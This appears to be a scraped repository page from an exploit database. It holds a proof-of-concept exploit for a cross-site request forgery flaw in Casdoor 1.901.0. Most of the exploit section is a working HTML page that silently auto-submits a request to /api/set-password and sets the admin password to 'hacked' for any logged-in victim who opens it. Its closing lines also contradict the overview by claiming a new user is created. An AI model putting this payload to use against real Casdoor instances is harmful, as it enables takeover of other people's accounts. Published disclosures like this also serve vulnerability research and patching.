3cc98cadb3
4 changes to exploits/shellcodes/ghdb Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF) Grokability Snipe-IT 8.0.4 - Insecure Direct Object Reference (IDOR) ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
39 lines
No EOL
1.3 KiB
HTML
39 lines
No EOL
1.3 KiB
HTML
# Exploit Title: Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
|
|
# Application: Casdoor
|
|
# Version: 1.901.0
|
|
# Date: 03/07/2024
|
|
# Exploit Author: Van Lam Nguyen
|
|
# Vendor Homepage: https://casdoor.org/
|
|
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip
|
|
# Tested on: Windows
|
|
# CVE : N/A
|
|
|
|
Overview
|
|
==================================================
|
|
Casdoor v1.901.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
|
|
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
|
|
|
|
Proof of Concept
|
|
==================================================
|
|
|
|
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
|
|
|
|
<html>
|
|
<form action="http://localhost:8000/api/set-password" method="POST">
|
|
<input name='userOwner' value='built-in' type='hidden'>
|
|
<input name='userName' value='admin' type='hidden'>
|
|
<input name='newPassword' value='hacked' type='hidden'>
|
|
<input type=submit>
|
|
</form>
|
|
<script>
|
|
history.pushState('', '', '/');
|
|
document.forms[0].submit();
|
|
</script>
|
|
|
|
</html>
|
|
|
|
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
|
|
|
|
userOwner: built-in
|
|
userName: admin
|
|
newPassword: hacked |